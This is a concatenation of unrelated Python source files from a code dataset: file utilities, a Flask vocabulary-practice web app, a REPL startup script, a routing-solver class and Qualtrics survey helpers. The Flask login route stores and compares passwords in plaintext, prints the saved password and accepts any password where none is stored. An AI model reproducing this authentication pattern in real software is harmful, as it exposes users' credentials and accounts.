@classmethod\n def does_path_exist(cls, path):\n return os.path.exists(path)\n\n @classmethod\n def create_files(cls, *files):\n for file in files:\n FileUtils.ensure_file_exists(file, create=True)\n\n @classmethod\n def create_new_empty_file(cls, path):\n dirname = os.path.dirname(path)\n if not os.path.exists(dirname):\n os.makedirs(dirname)\n file = open(path, \"w\")\n file.close()\n\n @classmethod\n def create_new_dir(cls, path, fail_if_created=True):\n if not os.path.exists(path):\n os.makedirs(path)\n elif fail_if_created:\n raise ValueError(\"Directory already exist: %s\", path)\n\n @classmethod\n def verify_if_dir_is_created(cls, path, raise_ex=True):\n if not os.path.exists(path) or not os.path.isdir(path):\n if raise_ex:\n raise ValueError(\"Directory is not created under path: \" + path)\n return False\n return True\n\n @classmethod\n def get_file_size(cls, file_path, human_readable=True):\n from pathlib import Path\n\n size = Path(file_path).stat().st_size\n if human_readable:\n return humanize.naturalsize(size, gnu=True)\n else:\n return str(size)\n\n @classmethod\n def check_size_match(cls, size, filepath):\n size_on_disk = FileUtils._get_file_size(filepath)\n return size_on_disk == int(size)\n\n @classmethod\n def check_size_less(cls, size, filepath):\n size_on_disk = FileUtils._get_file_size(filepath)\n return int(size) < size_on_disk\n\n @classmethod\n def _get_file_size(cls, f):\n return os.stat(f).st_size\n\n @classmethod\n def get_file_last_modified_date(cls, f):\n return os.path.getmtime(f)\n\n @classmethod\n def get_mod_date_of_file(cls, file):\n return os.path.getmtime(file)\n\n @classmethod\n def path_basename(cls, path):\n return os.path.basename(path)\n\n @classmethod\n def basename(cls, path):\n return os.path.basename(path)\n\n @classmethod\n def join_path(cls, *components):\n 
if components and components[0] and not components[0].startswith(os.sep) and not components[0].startswith(\"~\"):\n lst = list(components)\n lst[0] = os.sep + components[0]\n components = tuple(lst)\n return os.path.join(*components)\n\n @classmethod\n def make_path(cls, basedir, dirs):\n if not isinstance(dirs, list):\n LOG.warning(\n \"%s was called with wrong argument type for 'dirs', \"\n \"list is expected. Value of parameter: %s. \"\n \"Converting parameter to a list!\",\n FileUtils.make_path,\n dirs,\n )\n dirs = [dirs]\n return os.path.join(basedir, *dirs)\n\n @classmethod\n def get_parent_dir_name(cls, dir):\n path = Path(dir)\n return path.parent.__str__()\n\n @classmethod\n def is_dir_parent_of_dir(cls, parent, dir):\n parent_path_parts = Path(parent).parts\n dir_path_parts = Path(dir).parts\n try:\n idx = dir_path_parts.index(parent_path_parts[0])\n except ValueError:\n # Do not log anything\n return False\n\n for i in range(len(dir_path_parts)):\n if len(parent_path_parts) - 1 >= i and not dir_path_parts[i] == parent_path_parts[idx + i]:\n return False\n return True\n\n @classmethod\n def get_path_components(cls, path):\n return path.rsplit(os.sep)\n\n @classmethod\n def get_mod_dates_of_files(cls, basedir, *files):\n result = {}\n for f in files:\n f = FileUtils.join_path(basedir, f)\n if FileUtils.does_file_exist(f):\n result[f] = FileUtils.get_mod_date_of_file(f)\n else:\n result[f] = None\n return result\n\n @classmethod\n def get_home_path(cls, path):\n return os.path.expanduser(path)\n\n @classmethod\n def copy_file(cls, src, dest):\n LOG.info(f\"Copying file. {src} -> {dest}\")\n shutil.copyfile(src, dest)\n\n @classmethod\n def _move_files(cls, src, dst):\n FileUtils.ensure_dir_created(dst)\n files = os.listdir(src)\n for f in files:\n src_path = os.path.join(src, f)\n dst_path = os.path.join(dst, f)\n LOG.info(\"Moving: {} --> {}\", src_path, dst_path)\n os.rename(src_path, dst_path)\n\n @classmethod\n def change_cwd(cls, dir):\n cls.previous_cwd = os.getcwd()\n cls._change_cwd(dir)\n\n @classmethod\n def get_filename_from_cwd(cls, filename):\n return os.path.join(os.getcwd(), filename)\n\n @classmethod\n def reset_cwd(cls):\n if not cls.previous_cwd:\n LOG.warning(\"Can't reset CWD as there's no previous CWD saved!\")\n cls._change_cwd(cls.previous_cwd)\n\n @classmethod\n def _change_cwd(cls, dir):\n try:\n os.chdir(dir)\n LOG.info(\"Changed current working directory: %s\", dir)\n except OSError:\n LOG.error(\"Can't change the Current Working Directory to %s\", dir)\n\n @classmethod\n def _hash_files_in_dirs(cls, dirs):\n hash_data = {}\n for dir in dirs:\n hash_data[dir] = {}\n files = os.listdir(dir)\n for f in files:\n file_to_hash = os.path.join(dir, f)\n hash = cls.hash_file(file_to_hash)\n hash_data[dir][hash] = f\n return hash_data\n\n @classmethod\n def hash_file(cls, f):\n blocksize = 65536\n with open(f, \"rb\") as file:\n hasher = hashlib.md5()\n buf = file.read(blocksize)\n while len(buf) > 0:\n hasher.update(buf)\n buf = file.read(blocksize)\n return hasher.hexdigest()\n\n @classmethod\n def is_file(cls, f):\n if not os.path.exists(f):\n raise ValueError(\"Path does not exist: %s\", f)\n return os.path.isfile(f)\n\n @classmethod\n def ensure_is_file(cls, f):\n is_file = FileUtils.is_file(f)\n if not is_file:\n raise ValueError(\"%s is not a file!\", f)\n\n @classmethod\n def is_dir(cls, d, throw_ex=True):\n if not os.path.exists(d):\n if throw_ex:\n raise ValueError(\"Path does not exist: %s\", d)\n return os.path.isdir(d)\n\n @classmethod\n def 
get_unique_filepath(cls, dest_file):\n while FileUtils.does_path_exist(dest_file):\n file_path, ext = os.path.splitext(dest_file)\n dest_file = file_path + \"_1\" + ext\n return dest_file\n\n @classmethod\n def read_file(cls, f):\n return open(f, \"r\").read()\n\n @classmethod\n def read_file_to_list(cls, f):\n return open(f, \"r\").read().splitlines()\n\n @classmethod\n def does_file_contain_str(cls, file, string):\n with open(file) as f:\n if string in f.read():\n return True\n return False\n\n @classmethod\n def create_symlink_path_dir(\n cls, link_name, linked_path, dest_dir, remove_link_if_exists=True, remove_linked_file_if_exists=False\n ):\n link_src = linked_path\n link_dest = FileUtils.join_path(dest_dir, link_name)\n if remove_link_if_exists:\n if os.path.islink(link_dest):\n LOG.info(f\"Removing link dest: {link_dest}\")\n os.unlink(link_dest)\n else:\n LOG.warning(f\"Not removing not existing link dest: {link_dest}\")\n if remove_linked_file_if_exists:\n if os.path.exists(link_src) and FileUtils.is_file(link_src):\n LOG.info(f\"Removing linked file: {link_src}\")\n FileUtils.remove_file(link_src)\n elif os.path.exists(link_src) and FileUtils.is_dir(link_src):\n LOG.info(f\"Removing linked dir: {link_src}\")\n shutil.rmtree(link_src)\n else:\n LOG.warning(f\"Not removing not existing linked file or directory: {link_src}\")\n\n FileUtils.create_symlink(link_src, link_dest)\n\n @classmethod\n def create_symlink(cls, link_src, link_dest):\n LOG.info(\"Creating symlink: %s -> %s\", link_dest, link_src)\n # os.symlink(src, dest)\n # src: Already existing path to create the link pointing to\n # dest: Link name\n try:\n os.symlink(link_src, link_dest)\n except OSError as e:\n if e.errno == errno.EEXIST:\n LOG.warning(\"Symlink does exist, ignoring. 
Details: %s\", str(e))\n\n @classmethod\n def get_temp_file_name(cls, prefix=None):\n kwargs = {\"delete\": False}\n if prefix:\n kwargs[\"prefix\"] = prefix\n tmp = tempfile.NamedTemporaryFile(**kwargs)\n return tmp.name\n\n @classmethod\n def write_bytesio_to_file(cls, filename, bytesio):\n \"\"\"\n Write the contents of the given BytesIO to a file.\n Creates the file or overwrites the file if it does\n not exist yet.\n \"\"\"\n with open(filename, \"wb\") as outfile:\n # Copy the BytesIO stream to the output file\n outfile.write(bytesio.getbuffer())\n\n\nclass JsonFileUtils:\n @classmethod\n @timeit\n def write_data_to_file_as_json(cls, path, data, pretty=False):\n import json\n\n dirname = os.path.dirname(path)\n if not os.path.exists(dirname):\n os.makedirs(dirname)\n if not os.path.isdir(dirname):\n raise ValueError(\"Should have a dir in path, not a file: {}\".format(dirname))\n\n bytes_written = -1\n LOG.trace(\"Starting to write to file: %s\", path)\n with open(path, \"w\") as file:\n kwargs = {\"sort_keys\": True}\n if pretty:\n kwargs[\"indent\"] = 4\n json.dump(data, file, **kwargs)\n bytes_written = file.tell()\n LOG.trace(\"Finished writing to file: %s\", path)\n return bytes_written\n\n @classmethod\n def load_data_from_json_file(\n cls, file, create_if_not_exists=False, swallow_file_not_found=False, swallow_value_error=False\n ) -> Tuple[Any, int]:\n import json\n\n try:\n with open(file, \"r\") as f:\n data = json.load(f)\n bytes_read = f.tell()\n return data, bytes_read\n except FileNotFoundError as e:\n LOG.exception(\"Error while opening file: %s\", file)\n if create_if_not_exists:\n LOG.info(\"Creating new empty file: %s\", file)\n FileUtils.create_new_empty_file(file)\n if swallow_file_not_found:\n return None, 0\n raise e\n except ValueError as e:\n LOG.exception(\"Error while reading file: %s\", file)\n if swallow_value_error:\n return None, 0\n raise e\n\n\nclass CsvFileUtils:\n @classmethod\n def append_rows_to_csv_file(cls, file_path, data: List[Iterable[Any]], header=None):\n import csv\n\n # Validation\n if not isinstance(data, list):\n raise ValueError(\"Expected list of data for CSV row!\")\n if len(data) > 0 and not all([isinstance(cell, str) for row in data for cell in row]):\n raise ValueError(\"Expected list of str items for CSV row!\")\n\n new_file = cls._ensure_parent_dir_exists(file_path)\n with open(file_path, \"a\", newline=\"\") as csvfile:\n csv_writer = csv.writer(csvfile, delimiter=\";\", quotechar=\"|\", quoting=csv.QUOTE_MINIMAL)\n if new_file and header:\n csv_writer.writerow(header)\n for row in data:\n csv_writer.writerow(row)\n\n @classmethod\n def append_row_to_csv_file(cls, file_path, data: List[str], header=None):\n data = [data]\n CsvFileUtils.append_rows_to_csv_file(file_path, data, header=header)\n\n @classmethod\n def _ensure_parent_dir_exists(cls, path):\n parent_dir = FileUtils.get_parent_dir_name(path)\n if not FileUtils.is_dir(parent_dir, throw_ex=False):\n FileUtils.create_new_dir(parent_dir)\n new_file = False if os.path.exists(path) else True\n return new_file\n","repo_name":"szilard-nemeth/python-commons","sub_path":"pythoncommons/file_utils.py","file_name":"file_utils.py","file_ext":"py","file_size_in_byte":33429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"28385294923","text":"# navigate to the Features folder\nimport sys\nsys.path.append(sys.path[0]+'/./Features')\n\n# UNIVERSAL IMPORT\nfrom universal_imports import *\n\n#------------------------------\n\n# 
import all needed features\nimport helper\nimport grader\nimport quizzer\n\n#------------------------------\n\n# initialize the Data Store object\ndata_store = helper.data_store()\n\n#------------------------------\n\napp = flask.Flask(__name__, template_folder = 'Flask/templates', static_folder = 'Flask/static')\n\n@app.route(\"/\", methods=['GET', 'POST'])\ndef homepage():\n \"\"\"\n DESCRIPTION:\n Homepage of the website.\n These are what's going on:\n 1. get the user who's studying\n 2. check all study sets under the user\n 3. reformat the sets if needed\n \"\"\"\n\n # global variable\n global data_store\n\n #--------------------------\n\n # use sample user if no user is specified\n if data_store.login_status == False:\n # hardcode the sample user\n user = \"sample_user_1\"\n data_store.user = user\n\n else:\n # get the user\n user = data_store.user\n\n # gets all study sets under the user\n study_sets = helper.get_study_sets(user) # list of strings\n\n # reformat all sets belonging to the user\n for set_name in study_sets:\n\n # path to the study set\n path = \"Data/Users/\" + user + \"/\" + set_name + \".csv\"\n\n # DEBUGGING\n print(path)\n\n # read in the study set\n read_in_df = pd.read_csv(path, header = None)\n\n # check if the dataframe is already reformatted\n # get the number of columns of the dataframe\n num_cols = len(read_in_df.columns)\n\n # if the number of columns is 3, then it is already reformatted\n if num_cols >= 3:\n pass\n\n else:\n # reformat the dataframe\n set_df = helper.reformat_set_df(read_in_df)\n set_df.to_csv(path, index = False)\n\n #--------------------------\n\n \"\"\"\n Note:\n - Information on drop down menu: https://stackoverflow.com/questions/66627718/how-to-grab-the-value-from-the-drop-down-menu-using-flask\n \"\"\"\n\n # random a number from 1 to 5(inclusive)\n random_num = random.randint(1, 5)\n\n # random image on home page\n image_name = \"home \" + str(random_num) + \".gif\"\n\n home_image_address = flask.url_for('static', filename = image_name) \n\n return flask.render_template(\"home.html\",\\\n user = user,\\\n study_sets = study_sets,\\\n image_address = home_image_address)\n\n#------------------------------\n\n@app.route(\"/switch_user\", methods = ['POST'])\ndef switch_user():\n \"\"\"\n DESCRIPTION:\n Change the user's to access different study sets\n \"\"\"\n\n # global variable\n global data_store\n\n # get the current user\n current_user = data_store.user\n\n # render the page\n return flask.render_template(\"switch_user.html\", user = current_user)\n\n#------------------------------\n\n@app.route(\"/switch_user_result\", methods = ['POST'])\ndef switch_user_result():\n \"\"\"\n DESCRIPTION:\n Result of the log in effort\n \"\"\"\n\n # global variable\n global data_store\n\n # request user name and password\n user_name = flask.request.form.get('user_name')\n password = flask.request.form.get('password')\n\n # read in the logins data\n logins_df = pd.read_csv(\"Data/Logins.csv\")\n\n # check if the user exists\n if user_name in logins_df.User.values:\n\n # get the user's password\n user_password = logins_df[logins_df['User'] == user_name]['Password'].values[0]\n \n # DEBUGGING\n print(\"Saved Password: \", user_password)\n\n # check if the password is correct or if there is no password (sample user)\n if (user_password == password) or (type(user_password) != str):\n\n # update the data store\n data_store.login_status = True\n data_store.user = user_name\n\n # render the page\n return 
flask.render_template(\"switch_user_success.html\",\\\n user = user_name)\n\n else:\n\n # render the page\n return flask.render_template(\"switch_user_fail.html\")\n\n else:\n\n # render the page\n return flask.render_template(\"switch_user_fail.html\")\n\n#------------------------------\n\n@app.route(\"/writing_practice_start\", methods = ['GET', 'POST'])\ndef writing_practice_start():\n \"\"\"\n DESCRIPTION:\n This is the first page of the writing practice feature.\n It will initialize the study set, shuffle the words, and ask the first words.\n These are what's going on:\n 1. get the study set that the user wants to study\n 2. read in the set from local storage\n 3. shuffle the set and stored the shuffled order in data_store\n 4. get the first word and definition\n 5. ask the first word, then redirect to the check result page\n \"\"\"\n\n # global variable\n global data_store\n\n # get the requested study set\n chosen_set_name = flask.request.form.get('set')\n data_store.chosen_set_name = chosen_set_name\n\n # path to the set\n path = \"Data/Users/\" + data_store.user + \"/\" + chosen_set_name + \".csv\"\n data_store.set_path = path\n\n # read in the study set\n set_df = pd.read_csv(path)\n data_store.set_df = set_df\n data_store.to_export_df = set_df.copy()\n\n # get the study order\n study_indicies = quizzer.get_study_order(set_df)\n data_store.study_indicies = study_indicies\n\n # get the first word\n data_store.current_index = data_store.study_indicies.pop()\n\n # get the first definition\n first_definition = set_df.at[data_store.current_index, \"Definition\"]\n\n #--------------------------\n\n return flask.render_template(\"writing_practice.html\", definition = first_definition)\n\n#------------------------------\n\n@app.route(\"/writing_practice\", methods = ['GET', 'POST'])\ndef writing_practice():\n \"\"\"\n DESCRIPTION:\n This is a subsequent page of the writing practice feature.\n These are what's going on:\n 1. get the next word and definition\n 2. ask the next word\n 3. redirect to the check result page\n \"\"\"\n\n # global variable\n global data_store\n\n # if the study set round is completed, redirect to the completed page\n if len(data_store.study_indicies) == 0:\n\n return flask.render_template(\"set_completed.html\")\n\n else:\n\n # get the next word\n data_store.current_index = data_store.study_indicies.pop()\n\n # get the next definition\n definition = data_store.set_df.at[data_store.current_index, \"Definition\"]\n\n #--------------------------\n\n return flask.render_template(\"writing_practice.html\", definition = definition)\n\n#------------------------------\n\n@app.route(\"/writing_result\", methods = ['GET'])\ndef writing_result():\n \"\"\"\n DESCRIPTION:\n This is the page that checks the user's answer.\n These are what's going on:\n 1. get the user's answer\n 2. get the correct answer\n 3. 
compare the two answers, and display whether the user is correct or not\n    \"\"\"\n\n    # global variable\n    global data_store\n\n    # get the user's answer\n    user_answer = flask.request.args.get('user_answer')\n\n    # dataframe information\n    set_df = data_store.set_df\n    current_index = data_store.current_index\n\n    # print(helper.data_store.set_df.at[helper.data_store.current_index, \"Word\"])\n\n    # get the correct answer\n    assessment = grader.check_answer(user_answer, set_df, current_index)\n\n    # if the answer is correct\n    if assessment == True:\n\n        # to export df\n        to_export_df = data_store.to_export_df\n\n        # update the data of the result\n        to_export_df = helper.update_data_after_answer(assessment, to_export_df, current_index)\n\n        data_store.to_export_df = to_export_df\n\n        # update the data\n        data_store = helper.update_and_export_data(data_store)\n\n        #--------------------------\n\n        # random a number from 1 to 5 (inclusive)\n        random_num = random.randint(1, 5)\n\n        # random image on home page\n        image_name = \"correct \" + str(random_num) + \".gif\"\n\n        # DEBUGGING\n        print(\"IMAGE NAME: \" + image_name)\n\n        correct_image_address = flask.url_for('static', filename = image_name) \n\n        #--------------------------\n\n        # render webpage\n        return flask.render_template(\"writing_result_correct.html\",\\\n            word = user_answer,\\\n            image_address = correct_image_address)\n\n    else:\n\n        # to export df\n        to_export_df = data_store.to_export_df\n\n        # update the data of the result\n        to_export_df = helper.update_data_after_answer(False, to_export_df, current_index)\n\n        data_store.to_export_df = to_export_df\n\n        # update the data\n        data_store = helper.update_and_export_data(data_store)\n\n        #--------------------------\n\n        # random a number from 1 to 5 (inclusive)\n        random_num = random.randint(1, 5)\n\n        # random image on home page\n        image_name = \"wrong \" + str(random_num) + \".gif\"\n\n        wrong_image_address = flask.url_for('static', filename = image_name) \n\n        #--------------------------\n\n        # render webpage\n        return flask.render_template(\"writing_result_wrong.html\",\\\n            user_answer = user_answer,\\\n            correct_answer = set_df.at[current_index, \"Word\"],\\\n            image_address = wrong_image_address)\n\n#------------------------------\n\n@app.route(\"/learning_progress\", methods = ['GET'])\ndef learning_progress():\n\n    \"\"\"\n    DESCRIPTION:\n        Show the user the learning progress on a particular study set.\n    \"\"\"\n\n    # global variable\n    global data_store\n\n    # get the requested study set\n    chosen_set_name = flask.request.args.get('set')\n    data_store.chosen_set_name = chosen_set_name\n\n    # path to the set\n    path = \"Data/Users/\" + data_store.user + \"/\" + chosen_set_name + \".csv\"\n    data_store.set_path = path\n\n    # read in the study set\n    set_df = pd.read_csv(path)\n    data_store.set_df = set_df\n\n    # sort by mastery level\n    set_df = set_df.sort_values(by = ['Mastery'], ascending = False)\n\n    # filter the set to only contain words with certain conditions\n    mastered_df = set_df[set_df['Mastery'] == 3]\n    learning_df = set_df[(set_df['Mastery'] == 1) | (set_df['Mastery'] == 2)]\n    not_learned_df = set_df[set_df['Mastery'] == 0]\n    \n    # get the metrics\n    num_mastered = len(mastered_df)\n    num_learning = len(learning_df)\n    num_not_learned = len(not_learned_df)\n    num_set = len(set_df)\n\n    # calculate the percentage of words mastered, rounded to the nearest integer\n    percent_mastered = round(num_mastered / num_set * 100)\n\n    #--------------------------\n\n    return flask.render_template(\"learning_progress.html\",\\\n                                 study_set = chosen_set_name,\\\n                                 num_mastered 
= num_mastered,\\\n                                 num_learning = num_learning,\\\n                                 num_not_learned = num_not_learned,\\\n                                 num_set = num_set,\\\n                                 percent_mastered = percent_mastered,\\\n                                 study_set_html = [set_df.to_html(classes = 'study_set', header = \"true\")])\n\n#------------------------------\n\n@app.route(\"/reset_progress\", methods = ['GET'])\ndef reset_progress():\n\n    \"\"\"\n    DESCRIPTION:\n        Reset the mastery level of all words in the study set\n    \"\"\"\n\n    # global variable\n    global data_store\n\n    # get the requested study set\n    chosen_set_name = data_store.chosen_set_name\n\n    # path to the set\n    path = data_store.set_path\n\n    # read in the study set\n    set_df = pd.read_csv(path)\n    data_store.set_df = set_df\n\n    # reset the mastery level\n    set_df['Mastery'] = 0\n\n    # export the dataframe\n    set_df.to_csv(path, index = False)\n    data_store.set_df = set_df\n\n    # sort by mastery level\n    set_df = set_df.sort_values(by = ['Mastery'], ascending = False)\n\n    # filter the set to only contain words with certain conditions\n    mastered_df = set_df[set_df['Mastery'] == 3]\n    learning_df = set_df[(set_df['Mastery'] == 1) | (set_df['Mastery'] == 2)]\n    not_learned_df = set_df[set_df['Mastery'] == 0]\n    \n    # get the metrics\n    num_mastered = len(mastered_df)\n    num_learning = len(learning_df)\n    num_not_learned = len(not_learned_df)\n    num_set = len(set_df)\n\n    # calculate the percentage of words mastered, rounded to the nearest integer\n    percent_mastered = round(num_mastered / num_set * 100)\n\n    #--------------------------\n\n    return flask.render_template(\"reset_progress.html\",\\\n                                 study_set = chosen_set_name,\\\n                                 num_mastered = num_mastered,\\\n                                 num_learning = num_learning,\\\n                                 num_not_learned = num_not_learned,\\\n                                 num_set = num_set,\\\n                                 percent_mastered = percent_mastered,\\\n                                 study_set_html = [set_df.to_html(classes = 'study_set', header = \"true\")])\n\n#------------------------------\n@app.errorhandler(404)\ndef page_not_found(e):\n    return flask.render_template(\"404_page.html\")\n\n#------------------------------\n@app.errorhandler(500)\ndef internal_server_error(e):\n    return flask.render_template(\"500_page.html\")\n\n#------------------------------\nif __name__ == '__main__':\n\n    app.run(port = 2700)","repo_name":"NguyenTran2002/VoKab","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":13203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"7888259012","text":"from pathlib import Path\nfrom typing import List, Optional\n\n\nclass Command(object):\n    def execute(self, arguments: List[str]):\n        raise NotImplementedError\n\n    @staticmethod\n    def get_data_path(directory: str = \"Mods\") -> Path:\n        return Path(\"./data\").joinpath(directory)\n\n    @staticmethod\n    def get_path_from_arguments(arguments: List[str]) -> Optional[Path]:\n        if len(arguments) == 0:\n            print(\"Please provide path as a first argument\")\n            return None\n\n        mod_path = Path(arguments[0])\n        if not mod_path.exists():\n            print(\"Provided path does not exist: {}\".format(str(mod_path)))\n            return None\n\n        path = mod_path.joinpath(\"Mods\")\n        if not path.exists():\n            print(\"Provided path does not seem to be a mod directory
: {}\".format(\n                str(mod_path)))\n            return None\n\n        return path\n","repo_name":"takaaki-mizuno/7d2d_rh_localize_jp","sub_path":"sdtd_mod_localizer/commands/command.py","file_name":"command.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"9104924453","text":"# -*- coding: utf-8 -*-\n\"\"\"startup.py - loaded into interactive Python prompts.\"\"\"\n\nprint(\"(.startup.py)\")\n\nimport collections, datetime, itertools, math, os, pprint, re, sys, time\nprint(\"(imported collections, datetime, itertools, math, os, pprint, re, sys, time)\")\n\npp = pprint.pprint\n\n\n# paste code into the repl.\ndef paste():\n    import textwrap\n    exec(textwrap.dedent(sys.stdin.read()), globals())\n\n\n# readline and history support.\ndef hook_up_history():\n    try:\n        import readline\n    except ImportError:\n        print(\"No readline, use ^H.\")\n    else:\n        import atexit\n        import rlcompleter\n\n        class IndentableCompleter(rlcompleter.Completer):\n            def complete(self, text, state):\n                if text == \"\" or text.isspace():\n                    return [\" \", None][state]\n                else:\n                    return super().complete(text, state)\n\n        readline.parse_and_bind(\"tab: complete\")\n        readline.set_completer(IndentableCompleter().complete)\n\n        history_path = os.path.expanduser(\"~/.pyhistory{0}\".format(sys.version_info[0]))\n\n        if os.path.exists(history_path):\n            readline.read_history_file(history_path)\n\n        def save_history():\n            import readline\n            readline.write_history_file(history_path)\n\n        atexit.register(save_history)\n\n\n# don't do history stuff if we are IPython, it has its own thing.\nis_ipython = \"In\" in globals()\nif not is_ipython:\n    hook_up_history()\n\n\n# get rid of globals we don't want.\ndel is_ipython, hook_up_history\n","repo_name":"n0bml/dotfiles","sub_path":"startup.py","file_name":"startup.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"23911556007","text":"import time\nimport copy\n\nfrom src.solution_methods import *\nfrom src.route_classes import *\nfrom src.objects_managers import *\nfrom src.solution_classes import *\nfrom src import file_log\nfrom src import execution_log\nfrom src.objects_managers import ConstraintsObjects\n\n\nfrom src.solvers import SolverDPDPTW\nfrom src.solution_check import solution_check, get_solution_check_complete_data\n\n\nclass SolverDPDPTWHeterogeneousFleet(SolverDPDPTW):\n\n    def __init__(self):\n        super().__init__()\n\n    def initialize_class_attributes(self):\n        super().initialize_class_attributes()\n        self.fleet = None\n\n    def create_routes(self):\n        routes = []\n        for fleet_item in self.fleet.values():\n            for i in range(fleet_item[\"size\"]):\n                routes.append(Route(fleet_item[\"types\"]))\n        \n        return routes\n\n    def insert_fixed(self, solution):\n        routes = self.create_routes()\n        for route_pos, route_fixed_dict in enumerate(self.fixed_requests):\n            route_requests = route_fixed_dict[\"requests\"]\n            route_order = route_fixed_dict[\"route\"]\n            route_returned = None\n            \n            fleet_type_data = self.fleet[route_fixed_dict[\"fleet_type\"]]\n            vehic_type_needed = fleet_type_data[\"types\"]\n            \n            i = 0\n            while (route_returned is None):\n                route_attendance_type = routes[i].get_attendance_type()\n                if (route_attendance_type != vehic_type_needed):\n                    i += 1\n                    continue\n                solution.add_route(routes[i])\n                route_returned = self.insert_fixed_route_in_solution(\n                    routes[i],\n                    solution,\n                    route_pos,\n                    route_order,\n                    route_requests\n                )\n                
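`create_routes` and `insert_fixed` above imply a particular shape for `self.fleet`: a dict keyed by fleet type, each entry carrying a "size" (number of vehicles) and "types" (the attendance types matched via `get_attendance_type()`). A hedged sketch of that expansion; the fleet values and the `Route` stand-in are illustrative assumptions, not the project's real classes:

```python
# Hypothetical fleet layout, inferred from fleet_item["size"] / fleet_item["types"].
fleet = {
    "small_van": {"size": 2, "types": ("pickup", "delivery")},
    "truck": {"size": 1, "types": ("pickup",)},
}


class Route:
    """Minimal stand-in for src.route_classes.Route (assumed interface)."""

    def __init__(self, attendance_types):
        self.attendance_types = attendance_types

    def get_attendance_type(self):
        return self.attendance_types


def create_routes(fleet):
    # One empty Route per physical vehicle, tagged with its attendance types,
    # so fixed routes can later be matched against vehicles of the right kind.
    routes = []
    for fleet_item in fleet.values():
        for _ in range(fleet_item["size"]):
            routes.append(Route(fleet_item["types"]))
    return routes


print(len(create_routes(fleet)))  # 3 vehicles in the toy fleet -> 3 routes
```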
routes.pop(i)\n \n i += 1\n route_returned.set_start_position(route_fixed_dict[\"start\"])\n \n for route in routes:\n solution.add_route(route)\n \n solution.set_objective_value(self.obj_func.get_solution_cost(solution))\n\n return solution\n\n\n def get_attr_relation_reader(self):\n read_solv_attr_rela = {\n \"input_name\": \"output_name\",\n \"vertices\": \"vertices\",\n \"requests\": \"requests\",\n \"number_of_requests\": \"number_of_requests\",\n \"fixed_routes_dict\": \"fixed_requests\",\n \"fleet\" : \"fleet\"\n }\n return read_solv_attr_rela\n","repo_name":"thuzax/vrp-solver","sub_path":"solver/src/solvers/SolverDPDPTWHeterogeneousFleet.py","file_name":"SolverDPDPTWHeterogeneousFleet.py","file_ext":"py","file_size_in_byte":2547,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"28267938420","text":"import numpy as np\nimport pandas as pd\nimport sys\n\nimport settings\n\nclass QHelpers:\n def __init__(self, qualtrics_object, survey_data):\n self.q = qualtrics_object\n self.survey = self.q.survey_get(settings.qualtrics_survey)\n self.survey_data = survey_data\n self.N = len(self.survey_data['responses'])\n def mc2list(self, qcol, percent=False):\n try:\n qid = self.survey['exportColumnMap'][qcol]['question']\n question = self.survey['questions'][qid]\n except KeyError:\n raise RuntimeError(\"{0} is not a multiple choice, single-answer question\\n\".format(qcol))\n if question['questionType']['type'] == \"MC\" and (question['questionType']['selector'] == \"SAVR\" or question['questionType']['selector'] == \"SAHR\"):\n matrix=False\n elif question['questionType']['type'] == \"Matrix\" and question['questionType']['subSelector'] == \"SingleAnswer\":\n matrix=True\n else:\n raise RuntimeError(\"{0} is not a multiple choice, single-answer type question\\n\".format(qcol))\n return None\n n=0\n choices = question['choices']\n ck = sorted(choices.keys(), key=int)\n data = pd.Series([0]*len(ck), name=qcol, index=ck, dtype=int)\n for i in self.survey_data['responses']:\n ans = i[qcol]\n if ans == \"\":\n pass # Throw out questions they didn't answer\n else:\n n+=1\n data[ans] += 1\n if percent:\n if n > 0:\n data = data.apply(lambda x:x/n)\n names = []\n keys = data.index\n for i in keys:\n if not matrix:\n names.append(choices[i]['choiceText'])\n else:\n names.append(choices[i]['description'])\n data.index = names\n return data\n\n def ma2list(self, qcol): #Compiles the raw respondants from a multiple-choice-multiple-answer question\n qcols = {}\n for i in self.survey['exportColumnMap'].keys():\n if i.startswith(qcol+\"_\"):\n if i.endswith(\"_TEXT\"):\n continue\n try:\n qcols[i] = self.survey['exportColumnMap'][i]['choice'].split(\".\")\n except KeyError:\n raise RuntimeError(\"{0} is not a multiple choice-multiple answer question\\n\".format(qcol))\n qn = sorted(qcols.keys(), key=lambda k: int(qcols[k][2]))\n qid = self.survey['exportColumnMap'][qn[0]]['question']\n question = self.survey['questions'][qid]\n if question['questionType']['type'] != \"MC\" and question['questionType']['selector'] != \"MAVR\":\n raise RuntimeError(\"{0} is not a multiple choice-multiple answer question\\n\".format(qcol))\n return None\n choices = question['choices']\n data = pd.Series([0]*len(qn), name=qcol, index=qn, dtype=int)\n for i in self.survey_data['responses']:\n for j in i:\n if j in qn:\n ans = i[j]\n if (ans):\n data[j] += 1\n names = []\n for i in qn:\n c = qcols[i][2]\n names.append(choices[c]['choiceText'])\n data.index = names\n 
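`mc2list` above boils down to tallying single-answer responses into a `pandas.Series` indexed by choice id, with optional normalization by the number of respondents who answered. A toy reproduction of that core loop; the response dicts are fabricated stand-ins, not real Qualtrics payloads:

```python
import pandas as pd

qcol = "Q1"
choice_ids = ["1", "2", "3"]
# Fabricated responses; "" means the respondent skipped the question.
responses = [{"Q1": "1"}, {"Q1": "3"}, {"Q1": "1"}, {"Q1": ""}]

data = pd.Series([0] * len(choice_ids), name=qcol, index=choice_ids, dtype=int)
n = 0
for r in responses:
    ans = r[qcol]
    if ans == "":
        continue  # unanswered questions are thrown out, as in mc2list
    n += 1
    data[ans] += 1

percent = data / n if n > 0 else data  # the percent=True branch
print(data.to_dict(), percent.to_dict())
```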
